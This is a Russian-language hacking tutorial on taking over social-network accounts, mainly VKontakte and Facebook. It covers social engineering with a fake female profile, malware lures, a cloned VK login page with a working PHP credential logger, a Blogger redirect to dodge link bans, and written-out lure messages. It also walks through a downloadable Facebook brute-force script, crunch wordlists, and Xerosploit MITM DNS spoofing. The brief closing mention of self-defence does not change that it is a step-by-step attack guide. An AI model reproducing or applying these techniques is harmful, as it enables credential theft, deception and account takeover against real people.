Ломаем аккаунты в любых соцсетях
Приветствую вас, дорогие друзья. Мы поговорим с вами о том, как можно войти в аккаунт практически любой соцсети. Я попытаюсь проанализировать все основные способы, которые имеются у нас в настоящий момент. Более того, одной лишь теорией я не ограничусь. Как мы знаем, теория без практики – ничего не значит. Всякое сказанное слово нужно подкреплять делом. Я попытаюсь найти доступ к определенным аккаунтам. Посмотрим, что у меня получится.
Основные способы взлома:
- Собираем информационные данные
Далеко не все специалисты, занимающиеся вопросами такого рода, обращают внимание на данный пункт. И это ошибочный подход. Поскольку сила кроется именно в знании. Ваша задача – собрать как можно больше информации о профиле, который вы собираетесь взломать.
Прежде всего, нужно изучить страницу аккаунта. Принимая во внимание то, что «Вконтакте» в настоящий момент, вне всяких сомнений, является самой популярной социальной сетью на постсоветском пространстве, рассматривать будем именно эту платформу.
Изучите посты, которые закреплены. Обратите внимание на статус. Не лишним будет ознакомление с музыкальными пристрастиями «жертвы». Фото и видеозаписи также могут выступать в качестве источников важных данных. Следующий важный пункт – контактная информация. Не ограничивайтесь лишь беглым просмотром. Скопировать все это добро в ворд-документ можно всего за несколько секунд, не ленитесь. Не забывайте о месте проживания человека.
Начинаем диалог. Это один из столпов социальной инженерии. Создаем новый профиль. Как мне кажется, молодые люди чаще всего «клюют» на юных барышень с хорошими внешними данными. Именно поэтому я создал аккаунт девушки и наполнил его фотографиями и потратил время на раскрутку. В этом случае разоблачить меня будет сложнее.
СИ:
Пользователь начал полностью мне доверять уже через несколько дней. Мне удалось получить огромнейшее количество важных информационных данных. Я узнал его профессию, телефонный номер, дату рождения и т.п. Надеюсь, теперь вы понимаете, что не стоит рассказывать обо всех этих вещах первой встречной «девушке» из Интернета. Переходим к следующей стадии.
- Выбираем технологию
В данном случае все будет зависеть от того, на чем строится ваше общение, как именно вы заставили человека себе доверять. В общем и целом, способ взлома не важен. Если одна технология даст сбой, всегда можно применить другую.
Допустим, я разузнал, что моя жертва обожает сериал «Во все тяжкие». В этом случае я могу сделать ставку на фишинг, отослав ему малварь. Предлог может быть следующим: «Ты посмотри! Я нашла серию, которую еще нигде не показывали из-за каких-то там запретов». Жертва скачивает файл и открывает его (правда, еще придется разобраться с форматом материала и обходом av), полагая, что все хорошо. Однако когда человек в следующий раз зайдет на свой профиль, я получу его данные.
Если у вас мало собранной информации, попробуйте подбор пароля. Поиграйте с именем, фамилией, годом рождения и т.п. Вам также помогут базы с наиболее часто встречающимися паролями.
Реализация задуманного:
Фишинг
Это самая распространенная технология. Впрочем, без внесения моих собственных корректировок здесь не обошлось. Создаем фишинговый сайт. Сразу замечу, что в наше время фишинг уже не столь эффективн, как раньше. Впрочем, понимание таких механизмов все равно не будет для вас лишним.
Идем на страницу авторизации --> пкм --> сохранить как --> test_fish. Мы получили папку и один файл.
Открываем test_fish с помощью текстового редактора.
<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login" target="quick_login_frame">
Производим замену на:
<form method="POST" name="login" id="quick_login_form" action="./logs.php" target="quick_login_frame">
Теперь ищем строку 215 - 219 (JavaScript)
Над ней пишем
<!--
Потом ищем строку закрывающую тело тега script.
И после нее опять прописываем
-->
Тем самым мы закомментировали js код, который нам не нужен и может привести к лагам в работе. Сохраняем данный файл.
Создаем файл logs.php со следующим содержанием:
PHP:
<?php
$login = $_POST['email'];
$pass = $_POST['pass'];
$file = fopen("my_pass.txt", 'at');
fwrite($file,"Login --> $login\nPass --> $pass\n-----\n");
fclose($file);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>";
?>
Файл test_fish.html после ввода человеком данных отправляет их в logs.php. Затем произведется запись информации в файл my_pass.txt. Следующая стадия – человека перенаправляют в социальную сеть. При создании описываемого скрипта особое внимание следует уделить значению атрибута method. В рамках моей работы информация передается с использованием метода post. Значение атрибута name столь же важно. Если мы говорим о ВК, то здесь это будут e-mail и pass. Если вы увидите приблизительно такой код
<form method = 'GET' action = 'http://mysite/login.php'> <label> Login:</label> <input type = "text" name = "login" /> <label> Password:</label> <input type = "password" name = "passwd" /> <input type = "button" /> </form>
То начало скрипта logs.php выглядело бы следующим образом:
<?php
$login = $_GET['login'];
$pass = $_GET['passwd'];[/SIZE]
[SIZE=4].....
Переходим к завершающей стадии нашей работы. Все сформированные нами файлы должны оказаться на хостинге.
Используйте ПО FileZilla (если сложные способы не для вас). Идеальным вариантом будет, если название веб-страницы будет сильно отличаться от названия соцсети. В противном случае хостинг может заблочить. Получаем следующее:
После ввода определенных данных у меня не остается сомнений – технология работоспособна.
- Уделим внимание защищенности фишинга
Если человек получит от нас ссылку на fishing, то соцсеть ее забанит. Это происходит практически в 100% таких случаев. Если вы хотите обойти запрет, воспользуйтесь следующим методом (ну или любым другим, который удобнее для вас):
- Регистрируем акк в blogger.com;
- Создаем свой блог;
- Применяем Шаблон --> Изменить html.
- Сокращаем линк на fishing. Затем перед тегом <head> ставим следующий код:
<meta content='0; url=сокращенная_ссылка' http-equiv='Refresh'/>
Сохраняем.
И снова – социальная инженерия. Открываем ворд-документ с сохраненной нами ранее информацией. Пользователь, которого мы хотим взломать, получает от нас приблизительно следующее сообщение:
«Хай. Я тут наткнулась на очередной фан-сайт «Во все тяжкие». Кажется, здесь интересненько. Прикинь, им удалось достать эпизод, который ранее нигде не показывали. Лови ссылку: <Link>
Брутфорс
По своему опыту знаю, что в плане подбора паролей ВК безопаснее Фейсбука. Американский продукт все еще очень слаб в таких вопросах. Именно поэтому я создал профиль в этой социальной сети, оставив много информационных данных. Сейчас мы попытаемся сформировать базу паролей, а также применим давнишний скрипт для реализации brute force.
Итак, внешний вид моей страницы:
Ранее я уже говорил, что получаемую информацию лучше всего записывать. Не следует полагаться на свою память. Ведь вы можете упустить множество мелких деталей, которые могут иметь громадное значение. Первое что нам нужно – это имя и фамилия. Переходим к «угадыванию» профессии.
Порывшись в аккаунте, мне удалось найти даже телефонный номер. Выяснилось, что он действительно привязан к взламываемому профилю.
Переходим к бруту с применением скрипта faceboker.
https://mega.nz/#!hgUBhAYC!ZkqS0esOrEyrrrw0eKFiPuzqF1EYjAEHVVbAZJJ4R1c
Стандартный пароль "@deepside"
Производим распаковку и пишем:
chmod +x facebooker.pl ./facebooker <login> <wordlist>
Находим пароль в базе.
- Формируем собственную базу
Если в самых популярных хранилищах такого рода нужной информации вы не нашли, то можно попробовать сформировать собственную базу. Воспользуйтесь crunch.
Например, я формирую базу на человека с именем Саня. Я допускаю, что наш Саня не такой осторожный и его пароль – это лишь имя и несколько цифр. Применю следующую команду:
crunch 10 10 -t sanya.%%%% >> baza.txt
Скорее всего, представленные цифры это какая-то дата. Продолжаем наше расследование. В то же самое время вы должны помнить о том, что формирование базы отнимает огромное количество времени и сил.
- Проверяем номер
Как узнать, заходит ли жертва в аккаунт по номеру телефона, который у нас имеется? Возвращаемся к ВК. Используем мобильную версию. Нам нужна форма «Забыли пароль». Вводим номер, а также фамилию человека.
Если такой номер имеется, то он явно привязан к профилю.
MITM атака
Сразу же оговорюсь, что представленная технология не является эффективной на все сто процентов. В то же самое время в определенных случаях она приносит хорошие результаты.
Разберем анализируемую технологию чуть подробнее.
Представим, что у нас есть жертва, которую зовут Вася. Наверное, мне не нужно объяснять, что данные этого человека отправляются на маршрутизатор. В дело вступает искусство маскировки. Нам нужно превратиться именно в это устройство. Мы получим информацию, которую получает Васин роутер. Что касается самого маршрутизатора, то для него мы будем действовать от имени Васи.
А для этого нам понадобится MITM-фреймворк под названием Xerosploit. Нападения подобного рода в разы облегчаются благодаря ему.
Хорошо, произведем установку.
git clone https://github.com/LionSec/xerosploit cd xerosploit python install.py
Следом выбираете вашу ОС и установка завершена.
Проводим запуск:
xerosploit
Сканируем сеть:
scan
Можно увидеть, что данных он собрал довольно много. Настало время вписать локальный адрес жертвы. Затем выбираем следующее:
Сейчас попробую что-нибудь ввести с атакуемого устройства.
Все работает. Представленный фреймворк также пригодится и для другой технологии. Речь идет о следующем:
Осуществляем запуск apache с фишингом соц.сети. Можно использовать обычный html файл любых скриптов. Следующий шаг – открытие Xerosploit. Локальная страница становится доступной для жертвы. При этом одновременно осуществляется прослушка трафика.
Во время простой MITM-атаки, пользователь уже вошел в сеть. А поэтому овладеть данными будет сложнее. К тому же, велика вероятность получить не зашифрованную ssl информацию.
А этот способ поможет нам обойти эти барьеры.
- Запуск Apache
Мы открыли терминал и пропишем:
service apache2 start
Потом отправляемся в каталог /var/www/html/. Именно сюда сохраняем страницу авторизации.
- Фишинг
С помощью Xerosploit'а сканируем сеть и выбираем цель атаки. Потом:
dspoof --> run --> {имя вашего хоста}
- Прослушка
Нам нужно сократить ссылку - http://{ваш локальный ip}/
Отправляем ее жертве. Но прежде в новой вкладке снова запускаем Xerosploit и уже проводим сниф.
Заключение
Сегодня изучили основные нюансы технологии фишинга. Провели создание фишинговой страницы. Затронули метод подбора паролей, успешно разобрали на практике. Также, мы поговорили о методе MITM. Комбинация разобранных технологий обязательно поможет вам взломать аккаунт нужного вам человека, а также выработать эффективную стратегию защиты собственных аккаунтов в социальных сетях.